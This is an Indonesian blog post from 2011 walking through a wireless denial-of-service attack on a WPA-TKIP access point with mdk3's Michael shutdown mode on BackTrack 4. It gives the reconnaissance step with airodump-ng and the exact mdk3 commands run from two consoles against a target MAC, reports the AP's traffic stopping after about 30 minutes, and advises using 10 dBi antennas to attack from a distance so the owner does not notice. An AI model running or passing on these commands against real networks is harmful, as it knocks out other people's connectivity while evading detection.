Senin, 14 Maret 2011

MSE-TKIP Attacking AP with Michael Shutdown Exploitation

Persiapan :
[0] Wireless USB, saya mempergunakan 3 devices wireless USB yang support dengan packet injection, yaitu :
. Intel Wireless 3945ABG (My internal notebook Wireless).
Wireless devices ini saya gunakan untuk menjalankan Kismet dan Kismet Console.

. AirLive WL-360USB dengan antena Omni AirLive 10 dbi
Wireless devices ini saya gunakan untuk melakukan penyerangan pada Console 1.

. AirLive WL-1600USB dengan antena Omni AirLive 10 dbi
Wireless devices ini saya gunakan untuk melakukan penyerangan pada Console 2.
* Penyerangan dilakukan melalui 2 console agar AP yang menjadi target mendapat serangan yang
benar2 terserang.
* Saya mempergunakan antena omni 10 dbi agar dapat melakukan tindakan penyerangan dari kejauhan...
kalo dari deket nanti ketauan pemilik AP loh... becarefull !!!
[1] Dalam penyerangan ini saya mempergunakan Linux BackTrack 4 R1, saya tidak mempergunakan BackTrack 4 R2 karena saya belum donlod...lol
[2] Tentu ada AP yang menjadi target !!! kali ini yang menjadi target adalah AP milik kantor tempat saya bekerja yaitu : Linksys WRT54GL yang sudah diupgrade firmwarenya meempergunakan DDWRT versi 2.4 SP1.
Bagaimana teknik penyerangan :
+------------------------------------------------------------------------------+
| Memastikan devices wireless yang kita gunakan sudah terpasang : |
+------------------------------------------------------------------------------+
+------------------------------------------------+
| Memastikan ada AP yang akan diserang : |
+------------------------------------------------+
root@bt:~# airodump-ng wlan1
Perhatikan, yang menjadi target dalam kali ini adalah :
+----------------------------------------------------------------------------------+
| 00:25:9C:C1:30:0E   -37   484   0   0   11   54e.   WPA   TKIP   PSK   Hack_Me   |
+----------------------------------------------------------------------------------+
+------------------------------------------------------------+
| Penyerangan : Michael shutdown exploitation (TKIP) |
+------------------------------------------------------------+
command : ./mdk3  <wifi_interface>  m  -t  <mac_ap_target>
lakukan penyerangan pada 2 console :

console 1 :
root@bt:/pentest/wireless/mdk3# ./mdk3  wlan1  m  -t  00:25:9C:C1:30:0E
console 2 :
root@bt:/pentest/wireless/mdk3# ./mdk3  wlan2  m  -t  00:25:9C:C1:30:0E
Hasil Penyerangan yang dipantau Kismet Console :
* Lakukan teknik penyerangan ini selama kurang lebih 30 menit saja, traffic koneksi terhenti...koneksi terhenti...koneksi putus...putus....
Kismet Monitor pun hanya terdiam dan tidak mampu melakukan monitoring... Now, say "bye...bye...AP lol"


Salam, @nyapakid --> ありがとう || شكرا || 감사합니다 || grazie || merci || dank u || 謝謝 || Vielen Dank || gracias || σας ευχαριστώ || Спасибо || คุณขอบคุณ || teşekkür ederim || cảm ơn bạn || Thank You || Terima kasih.... salam penutup dariku السَّلاَمُ عَلَيْكُمْ وَرَحْمَةُ اللهِ وَبَرَكَاتُهُ

Tidak ada komentar:

Posting Komentar